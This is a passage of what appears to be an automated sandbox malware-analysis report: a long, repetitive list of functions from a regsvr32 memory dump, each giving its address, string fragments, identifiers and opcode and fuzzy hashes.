                                                                                                  • Opcode Fuzzy Hash: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
                                                                                                  • Instruction Fuzzy Hash: 52C1F471904788CFDB6CDFA8C88A59DBBB1FB48308F20421DE916AB261DBB49845CF41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E16C70 Relevance: 2.7, Strings: 2, Instructions: 226COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #z$UP
                                                                                                  • API String ID: 0-3609392360
                                                                                                  • Opcode ID: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
                                                                                                  • Instruction ID: cfd9aaa531578f3a3eb4de161ce4242589efbb27b652db38554ddff10e77df24
                                                                                                  • Opcode Fuzzy Hash: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
                                                                                                  • Instruction Fuzzy Hash: D0A13771904609DBDF58DFA8E4CA4DEBBB0FB64348F20411DE846A72A0DB749A95CFC1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E294BC Relevance: 2.7, Strings: 2, Instructions: 194COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: )bkr$z~
                                                                                                  • API String ID: 0-4035444816
                                                                                                  • Opcode ID: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
                                                                                                  • Instruction ID: 5c6004ead7f3b2ef84d0cf7bcedd18bdea0b681507af3adcdf45a28309e75696
                                                                                                  • Opcode Fuzzy Hash: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
                                                                                                  • Instruction Fuzzy Hash: BA8190711147888FEBB8CF28DC867D937A0FB45314F609119D88EDE292DF785A89DB41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E1EC30 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: aK>$NM
                                                                                                  • API String ID: 0-1076587397
                                                                                                  • Opcode ID: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
                                                                                                  • Instruction ID: 68d982b65b194f887011a25c73845f18d5b2cabad491485ee890907a541e4931
                                                                                                  • Opcode Fuzzy Hash: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
                                                                                                  • Instruction Fuzzy Hash: 05B144B590030DCFDB98CF28C18A58D7BB8FB55348F505129FC1E9A2A1E3B5E614CB56
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E1662C Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: GcX$cy5X
                                                                                                  • API String ID: 0-3427037236
                                                                                                  • Opcode ID: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
                                                                                                  • Instruction ID: 6b23261857cde3e742480a18002f94df3d5ab532efc8d324d466412f1852564b
                                                                                                  • Opcode Fuzzy Hash: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
                                                                                                  • Instruction Fuzzy Hash: A9A1D6B0148388CBEBBEDF34D89A6D93BA9FB44B04F504619E81E9E290DF745785CB41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E0AC94 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: &$U
                                                                                                  • API String ID: 0-326847644
                                                                                                  • Opcode ID: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
                                                                                                  • Instruction ID: 5043e0eceef7ee3929e21507be3fd06dc3fb61d8c97af9a4330ff171ab4cb349
                                                                                                  • Opcode Fuzzy Hash: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
                                                                                                  • Instruction Fuzzy Hash: A09179B190038E8FDF48CF68D88A5DE7BB0FB14348F104A19FC66AA250D7B4D665CB94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E15A00 Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: k' {$z5
                                                                                                  • API String ID: 0-3484172565
                                                                                                  • Opcode ID: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
                                                                                                  • Instruction ID: 8cdd41f3995b9a7098fa99300a06263b8372363138c7bf32d2a06b8b131216ca
                                                                                                  • Opcode Fuzzy Hash: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
                                                                                                  • Instruction Fuzzy Hash: 6E710571500749CFDB48DF24C88A5DA7BA1FB58348F114329FC8AAB2A0D778D994CBC4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E0AAB8 Relevance: 2.7, Strings: 2, Instructions: 152COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 6$D
                                                                                                  • API String ID: 0-3309211938
                                                                                                  • Opcode ID: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
                                                                                                  • Instruction ID: dc43f961ea080cc5df3c00da5fbbf42113869f8b50e6549bd1aafd7a84a77a32
                                                                                                  • Opcode Fuzzy Hash: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
                                                                                                  • Instruction Fuzzy Hash: 2B51397052478D9BDB98CF28DC899993BE4FB05308F94626CFC46D7292C774D886CB41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E07530 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #T$(Pv0
                                                                                                  • API String ID: 0-2531358951
                                                                                                  • Opcode ID: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
                                                                                                  • Instruction ID: f97d72528163cec467560e2d381522c8c4dee6174accee03e0c2cc342f7ec8c7
                                                                                                  • Opcode Fuzzy Hash: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
                                                                                                  • Instruction Fuzzy Hash: 16511E7050070E8BDF58DF18C88A4DE3BA0FB6839CF251619EC4AA6294D378D995CFC5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E13B14 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $$%9
                                                                                                  • API String ID: 0-3031553271
                                                                                                  • Opcode ID: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
                                                                                                  • Instruction ID: 7d5f6bc09293bc4bb85e2d886c2bc0c8632226bf1a06c4a8a1a74abd5842bf1d
                                                                                                  • Opcode Fuzzy Hash: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
                                                                                                  • Instruction Fuzzy Hash: 7441727061C7849BD798CF28C0C5A6FBAE1FB88354F90692EF486D7391C738C9848B42
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E0B07C Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: gd$s=z
                                                                                                  • API String ID: 0-3301279615
                                                                                                  • Opcode ID: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
                                                                                                  • Instruction ID: f798d29dfb4f6f02cfda8123c7b93fe0204032a725e5f0463a8c80c067de4245
                                                                                                  • Opcode Fuzzy Hash: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
                                                                                                  • Instruction Fuzzy Hash: 0A51E3B190030A8FDB48CF68D48A5DE7FF1FB68388F204219F856A6250D37486A4CFD5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E06138 Relevance: 2.6, Strings: 2, Instructions: 106COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !oW!$ke&Q
                                                                                                  • API String ID: 0-419570616
                                                                                                  • Opcode ID: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
                                                                                                  • Instruction ID: ea1fea907f003ec39065cca17086209c5a0045853850d007fe7306172111a287
                                                                                                  • Opcode Fuzzy Hash: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
                                                                                                  • Instruction Fuzzy Hash: E651D5B090074E8FDB48CF68C88A5DE7FB0FB68398F104619EC55A6290D7B496A5CFD0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E04758 Relevance: 2.6, Strings: 2, Instructions: 101COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ?j|$P
                                                                                                  • API String ID: 0-615948335
                                                                                                  • Opcode ID: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
                                                                                                  • Instruction ID: 5d6b8457f22b7aeef96ca591b9514609f58a3be980f097f4aa58880e0d1c3f40
                                                                                                  • Opcode Fuzzy Hash: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
                                                                                                  • Instruction Fuzzy Hash: 8041C2B090034A8FDB48CF64C48A5DE7FB1FB68388F50461DE816A6290D77896A4CFD1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E15880 Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: %$aI
                                                                                                  • API String ID: 0-3604358270
                                                                                                  • Opcode ID: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
                                                                                                  • Instruction ID: c2b7ca26b83d37642b34782f4552d2140b44291c255b6ad354f626828fd5b7eb
                                                                                                  • Opcode Fuzzy Hash: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
                                                                                                  • Instruction Fuzzy Hash: AA41C6B190038A8BCB48DF64C99A5DE7BB1FB48358F114A2DF86697350D3B49664CF84
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E18A2C Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: j$[
                                                                                                  • API String ID: 0-3696242357
                                                                                                  • Opcode ID: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
                                                                                                  • Instruction ID: 0ed4813b92bf08dccb37755c41c9486f6d2ab62242612dfd31a4f73770ef5b5a
                                                                                                  • Opcode Fuzzy Hash: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
                                                                                                  • Instruction Fuzzy Hash: 9441D5B090074E8BDB48DF64C48A5DE7FB1FB58398F11861DE856A6290D3B4D6A4CFC1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E1C058 Relevance: 2.6, Strings: 2, Instructions: 97COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: + $S"
                                                                                                  • API String ID: 0-2880694137
                                                                                                  • Opcode ID: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
                                                                                                  • Instruction ID: 6a5eddef56a812f58850962cc10ef5e6696074e45e4a85b9a6a5b599be3fcf1f
                                                                                                  • Opcode Fuzzy Hash: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
                                                                                                  • Instruction Fuzzy Hash: 2B51C6B090078E8FDF88DF64C88A5DE7BB0FB58354F10461DE866A6290D3B8D665CF85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E1B130 Relevance: 2.6, Strings: 2, Instructions: 97COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: =K$d%
                                                                                                  • API String ID: 0-2790768846
                                                                                                  • Opcode ID: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
                                                                                                  • Instruction ID: 0dc017c67e9e86b321d881c813cac6932b9d1dd252a2f315400d570117909b50
                                                                                                  • Opcode Fuzzy Hash: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
                                                                                                  • Instruction Fuzzy Hash: 3041E5B090074E8BDF48CF64C88A5DE7BF0FB58358F10461DE86AA6290D3B89665CF85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E095BC Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #|$`
                                                                                                  • API String ID: 0-1687004633
                                                                                                  • Opcode ID: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
                                                                                                  • Instruction ID: a5d9d39096a2b8e3398ea37e645684fd74e0f8b1aafd5a7a661dabf6bee3125e
                                                                                                  • Opcode Fuzzy Hash: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
                                                                                                  • Instruction Fuzzy Hash: 6441D6B190078E8FDF48CF68C88A4DE7BF0FB58358F014619F856A6250D3B89665CF85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E1C44C Relevance: 2.6, Strings: 2, Instructions: 87COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: c$j~;
                                                                                                  • API String ID: 0-3832213246
                                                                                                  • Opcode ID: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
                                                                                                  • Instruction ID: 2891536f61712a9e720867533185c54058b70abb351bd4da9dcdb71689e3236f
                                                                                                  • Opcode Fuzzy Hash: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
                                                                                                  • Instruction Fuzzy Hash: 0C41A5B080078E8FDB88DF64D88A1DF7BB0FB54358F104A19EC66A6250D3B49661CFD5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E07C08 Relevance: 2.6, Strings: 2, Instructions: 82COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: -h$W
                                                                                                  • API String ID: 0-4146498651
                                                                                                  • Opcode ID: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
                                                                                                  • Instruction ID: 3e91ad1ec085e6ba314545160cd07976664f79b4e5d459ef0d7dea1dbd01ebb4
                                                                                                  • Opcode Fuzzy Hash: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
                                                                                                  • Instruction Fuzzy Hash: C441B4B590038E9FDB44CF68D88A5CE7FF0FB48358F114619F869A6250D3B49664CF85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E28A00 Relevance: 2.6, Strings: 2, Instructions: 81COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .$fp
                                                                                                  • API String ID: 0-3298127435
                                                                                                  • Opcode ID: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
                                                                                                  • Instruction ID: 84d9223998ba9d1bc7df529e5fd07d2193f20b8d904377b249322ca08510e6ab
                                                                                                  • Opcode Fuzzy Hash: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
                                                                                                  • Instruction Fuzzy Hash: 2241F5B190470E8BDB48CF64C48A4DE7FB0FB28398F104619E856A6290D3B89665CFC4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E08FB0 Relevance: 2.6, Strings: 2, Instructions: 79COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "$Zs
                                                                                                  • API String ID: 0-3922668666
                                                                                                  • Opcode ID: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
                                                                                                  • Instruction ID: f1d62621bd08a38fa15a490595be93b85bae5397fb0987493b8f1264ce03d9fe
                                                                                                  • Opcode Fuzzy Hash: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
                                                                                                  • Instruction Fuzzy Hash: 803192B0529380ABC388DF28D19A91EBBE1FBD5708F806A1DF8C286390D374D406CB43
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E07840 Relevance: 2.6, Strings: 2, Instructions: 78COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: XW$s [
                                                                                                  • API String ID: 0-2366283936
                                                                                                  • Opcode ID: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
                                                                                                  • Instruction ID: c8620a86b0501fca327921337904d07bbca0ac58b79dbc40019122cd377fd21c
                                                                                                  • Opcode Fuzzy Hash: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
                                                                                                  • Instruction Fuzzy Hash: 623190B190478E8FDF48DF28D88949A3BE1FB48304B004A1DFC6AD7250D7B4D665CB95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E04C84 Relevance: 2.6, Strings: 2, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 4V$jn(
                                                                                                  • API String ID: 0-2529302498
                                                                                                  • Opcode ID: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
                                                                                                  • Instruction ID: cb5d544f3b4b9f04c9dfd671481ec3bad593690e5eb4dddf862df6e3aa1dae86
                                                                                                  • Opcode Fuzzy Hash: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
                                                                                                  • Instruction Fuzzy Hash: 17317EB1529381AFC398CF28C48A91ABBE0FBC9318F806A1DF8C686260D774D555CB02
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E0F65C Relevance: 2.6, Strings: 2, Instructions: 69COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: '$%6
                                                                                                  • API String ID: 0-1852427169
                                                                                                  • Opcode ID: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
                                                                                                  • Instruction ID: 05249663a0179330ad45d21934dcfd5c9628912d79576b4f5c22a08ed84997fc
                                                                                                  • Opcode Fuzzy Hash: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
                                                                                                  • Instruction Fuzzy Hash: CD316FB5568381ABD388DF28C48A81ABBF1FB89308F806A1DF8C6DB251D775D545CB43
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E08A8C Relevance: 2.6, Strings: 2, Instructions: 68COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: uS$J
                                                                                                  • API String ID: 0-437994327
                                                                                                  • Opcode ID: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
                                                                                                  • Instruction ID: fcac9b6946fcf1091511992b080734b663e6d98eca3396f6c51bc1604994ab08
                                                                                                  • Opcode Fuzzy Hash: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
                                                                                                  • Instruction Fuzzy Hash: 4331D8B190034E8FDB84CF64C8865DE7FB0FF28358F104619E859A62A0D3B88695CFD5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E10A70 Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
